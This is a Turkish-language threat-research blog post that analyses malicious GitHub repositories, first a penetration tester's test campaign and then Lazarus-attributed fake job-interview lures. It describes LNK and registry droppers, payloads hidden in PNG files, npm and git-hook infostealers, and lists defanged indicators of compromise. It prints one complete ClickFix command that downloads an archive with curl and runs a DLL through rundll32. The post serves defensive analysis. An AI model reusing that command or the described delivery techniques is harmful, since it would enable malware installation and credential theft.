Dikkat Lazarus Çıkabilir!

written by Mert SARICA | 1 June 2026

If you are looking for an English version of this article, please visit here.

İÇİNDEKİLER
  1. Başlangıç
  2. İnceleme
  3. Kim Bu Tehdit Aktörü
  4. Hokus Pokus
  5. Eyvah Lazarus!
  6. Yetiş Yapay Zeka
  7. Dağılın Ülen!
  8. Sonuç
  9. Güvenlik İhlali Göstergeleri (IOC)

Başlangıç

Aylar aylar önce, 2024 yılının Eylül ayından bu yana havalimanı işletmeciliği sektöründe yer alan bir şirketi hedef alan bir tehdit aktörüne ait Github deposu dikkatimi çekmişti. Azımsanamayacak sayıda aktivitesi olan bu depoyu o zamanlar çok yakından inceleme fırsatım olmadığı için ileride lazım olur diye tüm değişiklik kayıtları (commit) ile birlikte kenara (clone) kaydetmiştim.

Aradan aylar geçtikten sonra güvenlik araştırması için elimde ne var ne yok diye çıkınıma bakarken bu depo tekrar dikkatimi çekti ve bu defa yakından incelemeye karar verdim.


Lazarus

Lazarus

Lazarus

İnceleme

Depoya yüklenen ve depodan silinen tüm dosyaları, yapılan değişiklikleri rastgele incelemeye başladığımda, 13 Haziran 2025 tarihinde yüklenen REG uzantılı Fix_ PDF_FileType_Handler 1 dosyası dikkatimi çekti.

Lazarus

Bu dosya ile Windows işletim sistemine ping:// bağlantı protokolü ekleniyordu ve bu bağlantı çalıştırıldığında gizli bir PowerShell komutu açıp, https://github.com/doe17409 GitHub deposundan llvmfunc.dll dosyasını indiriyor, dosyayı gizli hale getiriyor ve ardından Windows’un rundll32.exe aracıyla çalıştırıyordu. Kısacası uzaktan zararlı bileşen (payload) indirip çalıştırmaya yönelik şüpheli bir yöntem kullanılıyordu.

llvmfunc.dll dosyasını indirmeye çalıştığımda deponun silindiğini fark ettiğim için bu dosyaya ulaşamadım. Ben de ardından ana depodaki dosyaları incelemeye başladığımda e85f596132e9ee26c3922f320d5ca4f3b403604b commit özeti altında yer alan Employee_Performance_Summary_2025Q21.zip dosyası içinde bu isimde bir dosya olduğunu gördüm.

lnkparse aracı ile Employee_Performance_Summary_2025Q21.lnk dosyasını incelediğimde bu dosya, kullanıcıya normal bir belge veya PDF açıyormuş gibi görünse de arka planda gizli bir PowerShell komutu çalıştırıyordu. Komut, kullanıcının Downloads klasöründeki ZIP dosyasını açıp içindeki llvmfunc.dll dosyasını gizli hale getiriyor ve ardından rundll32.exe üzerinden DLL içindeki test fonksiyonunu çalıştırıyordu.

Lazarus

strings aracı ile bu DLL dosyasını incelediğimde HellsHazzard.dll karakter dizisi (strings) hemen dikkatimi çekti.


Lazarus

Lazarus

HellsHazzard kelimesini Google’da arattığımda ise bunun Maldev Academy‘e ait olan ve EDR gibi güvenlik yazılımlarının API izleme mekanizmalarını aşmak amacıyla geliştirilmiş bir araç olduğunu öğrendim.

Lazarus

radare2 tersine mühendislik araç seti ile test fonksiyonunu incelediğimde ise bu fonksiyonun GitHub deposundan bir PNG dosyası indirip içindeki gizli veriyi bellekte işleyerek ikinci aşama yükü (2nd stage) çalıştırıyor gibi görünüyordu. (PNG dosyası depodan kaldırılmış olduğu için tam olarak bunu teyit etme şansım olmadı.) Diğer yandan tüm bunlar olurken kullanıcı şüphelenmesin diye Microsoft Edge üzerinde gerçek bir PDF dosyası tam ekran açılıyordu.

Lazarus

Yakın geçmişe ait daha güncel kayıtlarda, dosyalarda PNG dosyası var mı diye aramaya koyulduğumda başka bir depodaki 24 Kasım 2025 tarihli pms.html dosyası gözüme ilişti. Bu dosyayı incelediğimde ise JavaScript içine gömülü bir komut satırı olduğunu gördüm.

Lazarus

ClickFix yöntemi ile kullanıcıdan çalıştırılması istenen bu komut, Windows üzerinde arka planda gizli şekilde çalışan bir komut zinciri başlatıyordu. Kullanıcının Documents klasörüne geçtikten sonra GitHub’daki t.tar.gz adlı arşivi curl ile indiriyor, tar aracıyla içeriğini açıyor ve ardından çıkan t.dll dosyasını rundll32.exe üzerinden Cloudflare_ID_35129506721 adlı dışa aktarılmış fonksiyonu (export function) çağırarak çalıştırıyordu.

cONHoSt cONhosT CmD /c start "" /min CmD /c "cD %USERPROFILE%\Documents & CuRl https://raw.githubusercontent.com/xxxxx/t/refs/heads/main/t.tar.gz -o t.taR.Gz & tAr -xzf t.taR.Gz & sTaRt RuNdLL32.exe t.dll,Cloudflare_ID_35129506721"

Lazarus

t.dll dosyasını tersine mühendislikle analiz etmeden önce t deposunda tsss_cat.png isimli bir dosya olduğunu hatırladım. Maldev Academy araçlarına ilgi duyan bu tehdit aktörü acaba Maldev-Academy GitHub deposundan PNG dosyası özelinde geliştirilmiş bir araç kullanmış olabilir mi diye depoya göz atmaya başladığımda EmbedPayloadInPng aracı dikkatimi çekti.

Lazarus

Bu projenin diğer bir parçası olan ve PNG dosyasından şifreli zararlı kodu (payload) çeken ve çalıştıran aracı (FetchPayloadFromPng) incelediğimde, tsss_cat.png dosyası ile https://github.com/Maldev-Academy/EmbedPayloadInPng burada yazanların örtüştüğünü gördüm. 010 Editor ile PNG dosyasını analiz ettiğimde IDAT bölümünde şeytani bir şeyler olduğu anlaşılıyordu.

Lazarus

FetchPayloadFromPng aracı ile tsss_cat.png dosyasındaki şifreli zararlı kodu çözüp, strings aracı ile incelediğimde bunun Havoc Framework, kırmızı takım (red team) operasyonları ve saldırı simülasyonu amacıyla geliştirilmiş açık kaynaklı bir araç olduğunu gördüm.


Lazarus

Lazarus

Lazarus

Depodaki dosyalara biraz daha göz gezdirdiğimde tehdit aktörünün bir zaman hedef aldığı şirketteki kullanıcıların etki alanı (domain) parolalarını da çalmaya çalıştığını gördüm.


Lazarus

Lazarus

Kim Bu Tehdit Aktörü

Bir yandan tehdit aktörünün bitmek tükenmek bilmeyen azmini takdir etmeye başlamışken diğer yandan bu tehdit aktörünün kim ve hangi grubun üyesi olduğu aklımı ciddi şekilde kurcalamaya başlamıştı.

snapshots klasöründe yer alan değişiklik dosyalarından bazılarında Ekran görüntüsü 2025-06-13 145132.png gibi Türkçe isimli dosyaların yer alması tehdit aktörünün Türk olduğu ihtimalini güçlendiriyordu.

Lazarus

Hokus Pokus

GitHub arayüzüne baktığımda bu dosyaları yükleyen kişiye ait tek bilgi, bir kullanıcı adından ibaretti. Git objelerinde bundan daha fazlasının olduğunu bildiğim için t klasöründe git log –format=fuller komutunu çalıştırdığımda karşıma tehdit aktörü yerine Türkiye merkezli siber güvenlik danışmanlık ve hizmet şirketinde çalışan bir sızma testi uzmanı çıktı. :)

Lazarus

Tabii günümüzde yapay zeka tarafındaki gelişmeler nedeniyle artık ne gördüğümüze ne de duyduğumuza inanamadığımız için bu uzman ile iletişime geçip doğrulama ihtiyacı duydum. Aldığım yanıt neticesinde bunun uzun soluklu bir sızma testi çalışmasının parçası olduğunu öğrenmiş ve bu konuyu kapatmış oldum.

Lazarus

Eyvah Lazarus!

Gel zaman git zaman aradan aylar geçtikten sonra 2026 yılının Mayıs ayında, LinkedIn sosyal ağında bir hafta arayla paylaşılan mesajlar dikkatimi çekmeye başladı.

İlki Yaman URAL‘a ait olan bu mesajda, sahte iş teklifi ile dolandırıcılar tarafından hedef alındığını paylaşarak, bağlantılarını benzer girişimlere karşı uyarmaya çalışıyordu.


Lazarus

Lazarus

Aradan bir hafta geçmeden bu defa Ege ÇIKRIKÇI paylaştığı bu mesajda, bir tehdit aktörü tarafından nasıl hacklendiğini teknik detayları ile birlikte bağlantılarına aktarıyordu.


Lazarus

Lazarus

Her ikisi ile iletişime geçip, GitHub depo bilgilerini, dosyaları temin ettikten sonra işe koyulmaya karar verdim.

İlk olarak Yaman URAL’dan gelen depo bilgisini (https://github.com/roamanbuild/OnyxVerse) bir önceki araştırmamda yaptığım gibi indirip, git log –format=fuller komutunu çalıştırdım. Karşıma çıkan e-posta adreslerini Google’da aramaya başladığımda [email protected] e-posta adresi karşıma AllSecure’nin bu yazısını (North Korea Tried to Hack Our CEO Through a Fake Job Interview on LinkedIn) getirdi.

Lazarus

Yazının teknik detaylarını incelediğimde, Yaman URAL’ı hedef alan kişi veya kişiler ile bu yazıdaki tehdit aktörünün taktik ve teknikleri ile çok büyük bir oranda örtüşüyordu. Buna göre Yaman URAL’ı hedef alanlar sıradan dolandırıcıların aksine, siber suç dünyasında çok daha organize ve tehlikeli olduğu bilinen Kuzey Koreli Lazarus grubuydu! Ben de hemen elimdeki bu bilgiye istinaden Yaman URAL’ı ve bağlantılarını bu konuda bilgilendirdim.

Lazarus

Lazarus Grubu, siber güvenlik dünyasının en bilinen ve en tehlikeli devlet destekli hacker gruplarından biri olarak kabul edilmektedir.

Güvenlik araştırmacıları ve Batılı istihbarat kurumlarına göre grup, Kuzey Kore’nin istihbarat yapılanmalarıyla bağlantılıdır ve yaklaşık 2009 yılından bu yana aktif olarak faaliyet göstermektedir. “Hidden Cobra”, “APT38”, “Guardians of Peace” ve “ZINC” gibi farklı isimlerle de takip edilen Lazarus Grubu; siber casusluk, finansal hırsızlık, fidye yazılımı operasyonları ve kritik altyapılara yönelik saldırılarla tanınmaktadır.

Grup özellikle 2014 yılında Sony Pictures’a düzenlenen büyük saldırı, 2017’de dünya çapında yüz binlerce sistemi etkileyen WannaCry fidye yazılımı kampanyası ve son yıllarda kripto para borsalarına yönelik milyarlarca dolarlık siber saldırılarla gündeme gelmiştir.

Uzmanlara göre Lazarus’un temel amaçları arasında Kuzey Kore rejimine finansal kaynak sağlamak, yaptırımları aşmak, istihbarat toplamak ve jeopolitik operasyonlar yürütmek yer almaktadır. Günümüzde Lazarus Grubu, gelişmiş sosyal mühendislik teknikleri, özel zararlı yazılımlar ve sofistike operasyon kabiliyeti nedeniyle dünyanın en gelişmiş APT (Advanced Persistent Threat) gruplarından biri olarak değerlendirilmektedir.

Yetiş Yapay Zeka

Yukarıdaki gibi şüpheli durumlarda, GitHub depolarındaki kayıtları, değişiklikleri teker teker inceleyip büyük resmi ortaya çıkarmak günümüz yapay zeka çağında artık büyük bir hammallık haline geldiği için hem kişisel güvenlik araştırmalarımda hem de SOCRadar‘da gerçekleştirdiğimiz tehdit araştırmalarında bu işleri kolaylaştırmak, hızlandırmak için neler yapabileceğimi düşünmeye başladım.

Claude Code ile hemen hemen her gün mesai yapan biri olarak, boş vakitlerimde tehdit araştırmalarım için özel olarak geliştirdiğim platforma GitHub reposunu versem, indirse, IOCleri çıkarsa, daha sonra hem bunları hem de kaynak kodlarını Gemini ile analiz etse, arka kapı arasa, tehdit araştırma yazılarında, raporlarında da arasa tarasa ve eşleşme bulursa, TTPleri (taktik, teknik, prosedür) ile birlikte değerlendirerek tehdit aktörü ile eşleştirmeye çalışsa diye hayal etmeye başladım.

Bu hayalimi gerçekleştirmek için bir Pazar günümü, Claude Code ile yapay zeka destekli kodlamaya ayırdıktan sonra akşamına elimdeki GitHub depolarını, dosyaları analiz eden bir araç (GitHub Repo Forensics) ortaya çıkmış oldu.

Dağılın Ülen!

Test için ilk olarak https://github.com/roamanbuild/OnyxVerse deposunu analiz etmesi için araca verdiğimde hem tehdit aktörü ile eşleştirme hem de arka kapı analizi, AllSecure’nin yazısındaki tespitler ile örtüştü.


Lazarus

Lazarus

Lazarus

Analiz sonucunda bu GitHub deposunun, kimlik doğrulama mekanizması içerisine gizlenmiş bir arka kapı (backdoor) içerdiği anlaşılıyordu. Zararlı kod, sistemdeki tüm ortam değişkenlerini (process.env) uzak bir komuta kontrol (C2) sunucusuna göndererek bir bilgi hırsızı (infostealer) gibi davranıyor, ardından bu sunucudan ek JavaScript zararlı kodları (payload) indirip doğrudan bellekte çalıştırıyordu.

Özellikle new Function() kullanılarak uzaktan gelen kodların dinamik şekilde çalıştırılması, saldırganların sisteme istedikleri anda ikinci aşama zararlı yükler (stage2 payload) gönderebilmesine imkan tanıyordu. Bunun yanında package.json dosyası içerisindeki prepare betiği sayesinde kullanıcı yalnızca npm install komutunu çalıştırsa bile zararlı kod arka planda otomatik olarak devreye girerek kalıcılık sağlamaya çalışıyordu.

Analiz sırasında AWS erişim anahtarları, API anahtarları, veritabanı bağlantıları ve benzeri hassas bilgilerin dışarı sızdırılmasını hedefleyen fonksiyonlar dikkat çekerken, saldırganların komuta kontrol adresini Base64 ile gizlemeye çalıştığı da görülüyordu.

Dahası, asenkron çalışan validateApiKey() fonksiyonunun bilinçli şekilde hatalı kullanılması sayesinde doğrulama başarısız olsa bile zararlı kodun çalışmasının engellenmediği anlaşılıyordu.

Sıra Ege ÇIKRIKÇI’dan gelen dosyayı (AI-Powered_RWA_Finance_Platform.zip) analiz ettirmeye geldiğinde Ege’nin mesajında bahsettiği tespitler (tetiklenen hooklar: .git/hooks/post-checkout, .git/hooks/update.sample) arka kapı analizi sonuçları ile örtüşüyordu.


Lazarus

Lazarus

Lazarus



Lazarus

Lazarus

.git/hooks/update.sample dosyasındaki gizlenmiş kodlar çözüldüğünde bunun, birden fazla kaynakta da geçen (#1, #2, #3) bir bilgi hırsızı zararlı yazılımı (infostealer) olduğu anlaşılıyordu.


Lazarus

Lazarus

Analiz edilen zararlı JavaScript örneği, Node.js tabanlı gelişmiş bir bilgi hırsızı (infostealer) olarak öne çıkıyordu.

Kod içerisinde Chrome, Edge, Brave, Opera ve Chromium tabanlı tarayıcıların kayıtlı oturum ve parola verilerini hedef alan fonksiyonlar bulunurken, MetaMask, Phantom, Keplr, Exodus ve benzeri kripto para cüzdan eklentilerine ait yerel depolama dizinlerinin de sistematik şekilde toplandığı görülüyordu.

Zararlı kod ayrıca Windows DPAPI, macOS Keychain ve Linux Secret Service mekanizmalarını kullanarak tarayıcılarda saklanan şifreleri çözmeye çalışıyordu.

Bunun yanında .env, .pem, .pfx, SSH anahtarları, kripto para cüzdan kurtarma ifadeleri (seed phrase), API anahtarları ve finansal dokümanlar gibi hassas dosyaları tarayarak tehdit aktörlerine ait komuta kontrol (C2) sunucularına yüklemek üzere tasarlanmıştı.

Kodun WSL (Windows Subsystem for Linux) ortamını özel olarak algılayabilmesi ve Windows kullanıcı profillerine /mnt/c/Users/ yolu üzerinden erişmeye çalışması ise saldırganların geliştirici sistemlerini ve hibrit çalışma ortamlarını özellikle hedeflediğini gösteriyordu.

Tehdit aktörü eşleştirmesi de diğer kaynaklarla örtüşüyor ve oklar yine Lazarus Grubu’nu işaret ediyordu.

Lazarus

Sonuç

Bu araştırma bize bir kez daha gösterdi ki artık saldırganlar yalnızca zararlı yazılım geliştirmiyor; geliştiricilerin nasıl çalıştığını, hangi araçları kullandığını, hangi teknolojilere ilgi duyduğunu ve güven ilişkilerinin nasıl oluştuğunu da çok iyi biliyor.

Özellikle teknik mülakat süreçleri artık yalnızca yazılımcılar için değil, tehdit aktörleri için de bir operasyon alanına dönüşmüş durumda.

Bu nedenle sadece bilinmeyen yazılımlara ve uygulamalara değil;

  • GitHub depolarına,
  • Git hooklarına,
  • ZIP arşivleri içerisindeki script ve kısayol dosyalarına,
  • “run locally” denilen demo projelerine,
  • ve teknik mülakat süreçlerine bile şüpheyle yaklaşılması gerekiyor.

Diğer yandan bu araştırma sayesinde, bir siber güvenlik araştırmacısı olarak analiz süreçlerimi hem hızlandıracak hem de kolaylaştıracak yeni bir araç geliştirmiş oldum. Aynı zamanda bu araç SOCRadar ekosisteminin bir parçası haline de gelmiş oldu.

Bu araştırma sürecinde kendileriyle iletişime geçtiğim Yaman URAL ve Ege ÇIKRIKÇI’ya, ellerindeki teknik detayları çekinmeden paylaşarak bu çalışmaya katkıda bulundukları için gönülden teşekkür ederim.

Bir sonraki yazıda görüşmek dileğiyle, herkese güvenli günler dilerim.

Güvenlik İhlali Göstergeleri (IOC)

Tür Gösterge
IP Adresi 216.126.225[.]243
URL http://216.126.225[.]243:8086/upload
URL http://216.126.225[.]243:8085/upload
URL http://216.126.225[.]243:8087
URL https://project-mjecx.vercel[.]app/api
URL https://oracle-reg-check.vercel[.]app/api/validate?token=8gYk4zLx0pQ1WvH3Rj2BsC7fZ
URL https://oracle-v3-nu.vercel[.]app/api/validate?token=Z4T9QH
URL https://0g-auth-check.vercel[.]app/api/validate?token=Z4T9QH
URL https://www.0g-rollplay.netlify[.]app/
URL https://astrabytesyncs[.]com/
URL https://www.multibank-poker[.]netlify.app/
URL https://gglab-poker.netlify[.]app/api/
URL https://mbank-poker.netlify[.]app/api/
E-posta ambivalenced[@]gmail.com
E-posta luistech.0924[@]gmail.com
E-posta simonsharp331+1[@]gmail.com
E-posta luis[@]commerce-media.org
E-posta serhiiprymierov25+2[@]gmail.com
E-posta templejett03[@]gmail.com
E-posta lxin6793[@]gmail.com
E-posta aaronhiroto.bm[@]gmail.com
E-posta mjlescano[@]protonmail.com
E-posta pourcheriki[@]gmail.com
E-posta randhawamanpreet37[@]gmail.com
E-posta coinstar[@]gmail.com
E-posta webvlada2024[@]gmail.com